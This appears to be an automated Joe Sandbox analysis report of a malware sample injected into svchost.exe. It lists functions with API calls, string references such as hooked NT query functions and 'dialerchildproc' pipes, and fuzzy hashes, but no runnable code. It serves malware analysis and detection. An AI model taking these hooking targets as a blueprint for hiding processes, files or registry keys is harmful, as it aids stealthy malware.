Part of subcall function 0000023AF32E1FD4: GetProcAddress.KERNEL32 ref: 0000023AF32E1FFD

Part of subcall function 0000023AF32E5B30: GetCurrentThreadId.KERNEL32 ref: 0000023AF32E5B6B

Strings

sechost.dll, xrefs: 0000023AF32E1E39
NtQuerySystemInformation, xrefs: 0000023AF32E1D45
EnumServicesStatusExW, xrefs: 0000023AF32E1E11, 0000023AF32E1E32
NtEnumerateKey, xrefs: 0000023AF32E1DB9
EnumServiceGroupW, xrefs: 0000023AF32E1DF0
NtEnumerateValueKey, xrefs: 0000023AF32E1DD6
advapi32.dll, xrefs: 0000023AF32E1DF7, 0000023AF32E1E18
ntdll.dll, xrefs: 0000023AF32E1D2D
NtQueryDirectoryFileEx, xrefs: 0000023AF32E1D9C
NtResumeThread, xrefs: 0000023AF32E1D62
NtDeviceIoControlFile, xrefs: 0000023AF32E1E56
NtQueryDirectoryFile, xrefs: 0000023AF32E1D7F

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
Instruction ID: de7cba9eaa82766f2ac71d34862b1f30ad60a327fc8075d0386d60777f2da56b
Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
Instruction Fuzzy Hash: 9E31AEA4210A4AA0EB08EF65E85A7D4A324BB24744F84513394D942DEADF7FC389D793

Function 0000023AF32B6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000023AF32B6938
__scrt_acquire_startup_lock.LIBCMT ref: 0000023AF32B698A
_RTC_Initialize.LIBCMT ref: 0000023AF32B69B8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000023AF32B69DE
__scrt_release_startup_lock.LIBCMT ref: 0000023AF32B6A09

Strings

`eh vector copy constructor iterator', xrefs: 0000023AF32B6A3B
scriptor', xrefs: 0000023AF32B6B39, 0000023AF32B6BB2, 0000023AF32B6BEC
`eh vector vbase copy constructor iterator', xrefs: 0000023AF32B69EE
`dynamic initializer for ', xrefs: 0000023AF32B69C7

Memory Dump Source

Source File: 0000002E.00000002.3324067939.0000023AF32B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32b0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
API String ID: 190073905-1786718095
Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction ID: aa7523ff3450d8138d324d1415d18bdd61c465b0ca31d792af1584c48e49331f
Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction Fuzzy Hash: 0281BF2170064186FB5CAB66944D35962A0FBB5B80F5880359AC987FE7DF3FCB868743

Function 0000023AF32ECE28 Relevance: 18.1, APIs: 12, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 0000023AF32ECE37
FlsGetValue.KERNEL32(?,?,?,0000023AF32F0A6B,?,?,?,0000023AF32F045C,?,?,?,0000023AF32EC84F), ref: 0000023AF32ECE4C
FlsSetValue.KERNEL32(?,?,?,0000023AF32F0A6B,?,?,?,0000023AF32F045C,?,?,?,0000023AF32EC84F), ref: 0000023AF32ECE6D
FlsSetValue.KERNEL32(?,?,?,0000023AF32F0A6B,?,?,?,0000023AF32F045C,?,?,?,0000023AF32EC84F), ref: 0000023AF32ECE9A
FlsSetValue.KERNEL32(?,?,?,0000023AF32F0A6B,?,?,?,0000023AF32F045C,?,?,?,0000023AF32EC84F), ref: 0000023AF32ECEAB
FlsSetValue.KERNEL32(?,?,?,0000023AF32F0A6B,?,?,?,0000023AF32F045C,?,?,?,0000023AF32EC84F), ref: 0000023AF32ECEBC
SetLastError.KERNEL32 ref: 0000023AF32ECED7
FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000023AF32F0A6B,?,?,?,0000023AF32F045C,?,?,?,0000023AF32EC84F), ref: 0000023AF32ECF0D
FlsSetValue.KERNEL32(?,?,00000001,0000023AF32EECCC,?,?,?,?,0000023AF32EBF9F,?,?,?,?,?,0000023AF32E7AB0), ref: 0000023AF32ECF2C

Part of subcall function 0000023AF32ED6CC: HeapAlloc.KERNEL32 ref: 0000023AF32ED721

FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000023AF32F0A6B,?,?,?,0000023AF32F045C,?,?,?,0000023AF32EC84F), ref: 0000023AF32ECF54

Part of subcall function 0000023AF32ED744: HeapFree.KERNEL32 ref: 0000023AF32ED75A
Part of subcall function 0000023AF32ED744: GetLastError.KERNEL32 ref: 0000023AF32ED764

FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000023AF32F0A6B,?,?,?,0000023AF32F045C,?,?,?,0000023AF32EC84F), ref: 0000023AF32ECF65
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000023AF32F0A6B,?,?,?,0000023AF32F045C,?,?,?,0000023AF32EC84F), ref: 0000023AF32ECF76

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: Value$ErrorLast$Heap$AllocFree
String ID:
API String ID: 570795689-0
Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
Instruction ID: 4f1da59daabb27cd6b0dd6ca2d60cef7b0ed2b74a20c8addae82343016ffbeb4
Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
Instruction Fuzzy Hash: 52419D6060025446FB6CA3B9554F369B24A5F647B4F184734E8F606EEADE3EDBC18203

Function 0000023AF32E2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000023AF32E2259
GetCurrentProcessId.KERNEL32 ref: 0000023AF32E2263

Part of subcall function 0000023AF32E1934: OpenProcess.KERNEL32 ref: 0000023AF32E1952
Part of subcall function 0000023AF32E1934: IsWow64Process.KERNEL32 ref: 0000023AF32E1968
Part of subcall function 0000023AF32E1934: CloseHandle.KERNEL32 ref: 0000023AF32E1983

CreateFileW.KERNEL32 ref: 0000023AF32E22BC
WriteFile.KERNEL32 ref: 0000023AF32E22E4
ReadFile.KERNEL32 ref: 0000023AF32E2303
CloseHandle.KERNEL32 ref: 0000023AF32E230C

Strings

\\.\pipe\dialerchildproc32, xrefs: 0000023AF32E2293
\\.\pipe\dialerchildproc64, xrefs: 0000023AF32E228C

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
Instruction ID: a8d4ddb08ab43e39ca41348e59499764ae55964e0db52882bde19170e5b30b0e
Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
Instruction Fuzzy Hash: 84213D3261475083EB14DB25E54875A67A4F799BA4F500225EA9A03FE8CF3DC249CF01

Function 0000023AF32EA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000023AF32EA5A1

Part of subcall function 0000023AF32EB414: __GetUnwindTryBlock.LIBCMT ref: 0000023AF32EB457
Part of subcall function 0000023AF32EB414: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000023AF32EB47C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000023AF32EA679
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000023AF32EA8CE
std::bad_alloc::bad_alloc.LIBCMT ref: 0000023AF32EA9DA

Strings

csm, xrefs: 0000023AF32EA622
csm, xrefs: 0000023AF32EA5BB
csm, xrefs: 0000023AF32EA69C

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
Instruction ID: b4d8cd867aaeb3ad171d14d2f9034518e5dc5eb0835e7de6886729e79cec17f7
Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
Instruction Fuzzy Hash: 76E17D726047808AEB28DF65D48A39DB7A8FB65798F100126EEC957F95CB3DC6C1C702

Function 0000023AF32B9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000023AF32B99A1

Part of subcall function 0000023AF32BA814: __GetUnwindTryBlock.LIBCMT ref: 0000023AF32BA857
Part of subcall function 0000023AF32BA814: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000023AF32BA87C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000023AF32B9A79
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000023AF32B9CCE
std::bad_alloc::bad_alloc.LIBCMT ref: 0000023AF32B9DDA

Strings

csm, xrefs: 0000023AF32B9A22
csm, xrefs: 0000023AF32B9A9C
csm, xrefs: 0000023AF32B99BB

Memory Dump Source

Source File: 0000002E.00000002.3324067939.0000023AF32B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32b0000_svchost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction ID: 5cd99f4a483f263c615ceea0efd3ddc411abd48ac49001fa3fe7c477d7fb9094
Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction Fuzzy Hash: 81E19C72604B80CAEB689B25D48839D77A0F769B88F104525EEC957F99CB3EC291C702

Function 0000023AF32EF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32 ref: 0000023AF32EF510
GetProcAddress.KERNEL32 ref: 0000023AF32EF51C

Strings

ext-ms-, xrefs: 0000023AF32EF46D
api-ms-, xrefs: 0000023AF32EF45A

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
Instruction ID: 7e27abf47b83b17f015314e1dc6a0d4402c721e608e4e3179cb03febb156a4ab
Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
Instruction Fuzzy Hash: 5541F823315A0051FB19CB66A809759A399FF65BE0F0A41359E8D87FC4EF3EC7858302

Function 0000023AF32E104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000023AF32E10B1
RegEnumValueW.ADVAPI32 ref: 0000023AF32E1117
GetProcessHeap.KERNEL32 ref: 0000023AF32E115A
HeapAlloc.KERNEL32 ref: 0000023AF32E1168
GetProcessHeap.KERNEL32 ref: 0000023AF32E1185
HeapFree.KERNEL32 ref: 0000023AF32E1193

Strings

d, xrefs: 0000023AF32E10D6

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
Instruction ID: c2ce9a83bb39aa8cf87631e872da634b098ba8a270060c436afb6f1334a8ced9
Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
Instruction Fuzzy Hash: B9417C76214B84C6E764CF21E44979EB7A5F388B88F048129DA890BB98DF3DD589CB01

Function 0000023AF32ED068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FlsGetValue.KERNEL32(?,?,?,0000023AF32EC7DE,?,?,?,?,?,?,?,?,0000023AF32ECF9D,?,?,00000001), ref: 0000023AF32ED087
FlsSetValue.KERNEL32(?,?,?,0000023AF32EC7DE,?,?,?,?,?,?,?,?,0000023AF32ECF9D,?,?,00000001), ref: 0000023AF32ED0A6
FlsSetValue.KERNEL32(?,?,?,0000023AF32EC7DE,?,?,?,?,?,?,?,?,0000023AF32ECF9D,?,?,00000001), ref: 0000023AF32ED0CE
FlsSetValue.KERNEL32(?,?,?,0000023AF32EC7DE,?,?,?,?,?,?,?,?,0000023AF32ECF9D,?,?,00000001), ref: 0000023AF32ED0DF
FlsSetValue.KERNEL32(?,?,?,0000023AF32EC7DE,?,?,?,?,?,?,?,?,0000023AF32ECF9D,?,?,00000001), ref: 0000023AF32ED0F0

Strings

1%, xrefs: 0000023AF32ED0CE
Y%, xrefs: 0000023AF32ED0A6

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: Value
String ID: 1%$Y%
API String ID: 3702945584-1395475152
Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
Instruction ID: 9b97164e2f521d5ce6a6030bd677edd7b008a30c487866d669dd02ea5029d614
Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
Instruction Fuzzy Hash: F211936470024046FB6CA726965F369E2495F647F0F184334A8F90BEDADE2FC7828212

Function 0000023AF32E7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000023AF32E7538
__scrt_acquire_startup_lock.LIBCMT ref: 0000023AF32E758A
_RTC_Initialize.LIBCMT ref: 0000023AF32E75B8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000023AF32E75DE
__scrt_release_startup_lock.LIBCMT ref: 0000023AF32E7609

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction ID: cc4bd47b747a076d3a70656ebe8af1318798e3ef24b2b66c07c979a3a6a4a38b
Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction Fuzzy Hash: F781D02170020186FB5CAB6DE44B39DA298AF75B84F184435EAC447FD6EB3FCB859702

Function 0000023AF32E9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 0000023AF32E9E49
GetLastError.KERNEL32 ref: 0000023AF32E9E57
LoadLibraryExW.KERNEL32 ref: 0000023AF32E9E81
FreeLibrary.KERNEL32 ref: 0000023AF32E9EC7
GetProcAddress.KERNEL32 ref: 0000023AF32E9ED3

Strings

api-ms-, xrefs: 0000023AF32E9E69

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
Instruction ID: 29a3aad0747f712a65b36c3bf1f5cb4a4b5ca32a0e5e27ed2c0d311cdf3eb7cb
Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
Instruction Fuzzy Hash: 7131C721312740D1EF19DB52A409B59A29CFB68BA0F5D09379E9D07BD0DF3EC6C58742

Function 0000023AF32F3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0000023AF32F3DE5
GetLastError.KERNEL32 ref: 0000023AF32F3DF1
CloseHandle.KERNEL32 ref: 0000023AF32F3E09
CreateFileW.KERNEL32 ref: 0000023AF32F3E34
WriteConsoleW.KERNEL32 ref: 0000023AF32F3E53

Strings

CONOUT$, xrefs: 0000023AF32F3E15

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
Instruction ID: 9dc6895154f490a0fa1379aad1beb104b20039b2d52934f260433463d6ad7ce2
Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
Instruction Fuzzy Hash: 5E118231710B4086E7549B66E84831D76A4F798FE8F144234EEDA87BD4CF3DC6148B85

Function 0000023AF32E3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000023AF32E379E
GetCurrentProcess.KERNEL32 ref: 0000023AF32E37CC
VirtualProtectEx.KERNEL32 ref: 0000023AF32E37EE
GetCurrentProcess.KERNEL32 ref: 0000023AF32E3809
VirtualProtectEx.KERNEL32 ref: 0000023AF32E382A

Strings

wr, xrefs: 0000023AF32E37FF

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID: wr
API String ID: 1092925422-2678910430
Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
Instruction ID: ee159a358a29a47cc67f4c3be2c5703ed440c377ad2b83d771141e801391207f
Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
Instruction Fuzzy Hash: 9E113C2670474183EF189B21F449669B2B8FB58B85F540039DFC907B94EF3EC645CB05

Function 0000023AF32E5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000023AF32E5B6B
GetThreadContext.KERNEL32 ref: 0000023AF32E5CD5

Part of subcall function 0000023AF32E5960: GetCurrentThreadId.KERNEL32 ref: 0000023AF32E5964

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
Instruction ID: 78766e4399c8dc549f545ec081a1babf1706de50ce668165723e5713332fdb27
Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
Instruction Fuzzy Hash: E6D1BC76214B8881DB74DB0AE49535AB7B4F7D8B88F140226EACD47BA5CF3DC681CB41

Function 0000023AF32E2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000023AF32E2F27
HeapAlloc.KERNEL32 ref: 0000023AF32E2F3A
StrCmpNIW.SHLWAPI ref: 0000023AF32E2FAF
GetProcessHeap.KERNEL32 ref: 0000023AF32E3015
HeapFree.KERNEL32 ref: 0000023AF32E3023

Strings

dialer, xrefs: 0000023AF32E2FA8

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
Instruction ID: e058bc9bb3b8aa6a493347436ec1e847b338baec1071684e9e682a020670fa46
Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
Instruction Fuzzy Hash: D431C722701B5182E718DF26D54972AA7A4FF64B85F0841349FC947F95EF3EC6E18701

Function 0000023AF32E14A4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 70memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000023AF32E14C5
HeapFree.KERNEL32 ref: 0000023AF32E14D4
GetProcessHeap.KERNEL32 ref: 0000023AF32E14E1
HeapFree.KERNEL32 ref: 0000023AF32E14F0
GetProcessHeap.KERNEL32 ref: 0000023AF32E1500

Strings

C:\Windows\system32\svchost.exe, xrefs: 0000023AF32F61A9, 0000023AF32F61B1

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID: C:\Windows\system32\svchost.exe
API String ID: 3168794593-4180442734
Opcode ID: d27b9b8ca154d9eedff1e610dfbacc8608a6d25d7c3fe3b6d17278c798082fda
Instruction ID: 86b26c9247c8104daadc16f0a306905e38207ed0c73cb0503fda9d0042af8dc4
Opcode Fuzzy Hash: d27b9b8ca154d9eedff1e610dfbacc8608a6d25d7c3fe3b6d17278c798082fda
Instruction Fuzzy Hash: 3821A567608AD08AE358EF359C5929E27A9F765F44F094035DBC543BC3DE2FD6048B02

Function 0000023AF32ECFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000023AF32ECFAF
FlsSetValue.KERNEL32(?,?,?,0000023AF32ED6B5,?,?,?,?,0000023AF32ED778), ref: 0000023AF32ECFE5
FlsSetValue.KERNEL32(?,?,?,0000023AF32ED6B5,?,?,?,?,0000023AF32ED778), ref: 0000023AF32ED012
FlsSetValue.KERNEL32(?,?,?,0000023AF32ED6B5,?,?,?,?,0000023AF32ED778), ref: 0000023AF32ED023
FlsSetValue.KERNEL32(?,?,?,0000023AF32ED6B5,?,?,?,?,0000023AF32ED778), ref: 0000023AF32ED034
SetLastError.KERNEL32 ref: 0000023AF32ED04F

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
Instruction ID: d626b139bf2515b181b52ca9d9c8d6f5990de9874432f050005ae24276e9d5b3
Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
Instruction Fuzzy Hash: E111632070024046FB6CA776965F329A24A6F647B4F184735A8F647FDADE2EC7818612

Function 0000023AF32E199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000023AF32E19C2
K32GetModuleFileNameExW.KERNEL32 ref: 0000023AF32E19E0
PathFindFileNameW.SHLWAPI ref: 0000023AF32E19EF
lstrlenW.KERNEL32 ref: 0000023AF32E19FB
StrCpyW.SHLWAPI ref: 0000023AF32E1A0E
CloseHandle.KERNEL32 ref: 0000023AF32E1A1C

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
Instruction ID: aa8edf9784ca19634c0ee458ceaeb90963ad875c59a58248a1554905202c4035
Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
Instruction Fuzzy Hash: 24012D21700A4082EB68DB62E45C75AA3A9FB98FC4F584035DEC943B95DF3DCA89CB41

Function 0000023AF32E36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000023AF32E36E4
GetCurrentProcess.KERNEL32 ref: 0000023AF32E36F2
VirtualProtectEx.KERNEL32 ref: 0000023AF32E3714
GetCurrentProcess.KERNEL32 ref: 0000023AF32E3732
VirtualProtectEx.KERNEL32 ref: 0000023AF32E3753
TerminateThread.KERNEL32 ref: 0000023AF32E3762

Memory Dump Source

Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
Instruction ID: 423760b10cb6e8f78dc04e5dde3cead2652d295327a5c384355b2ac6181d5524
Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
Instruction Fuzzy Hash: 18012D6531174082EB289B21E84D71A77A8FB65B86F180538CED907BD5EF3FC648CB02

Function 0000023AF32E9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000023AF32E9013
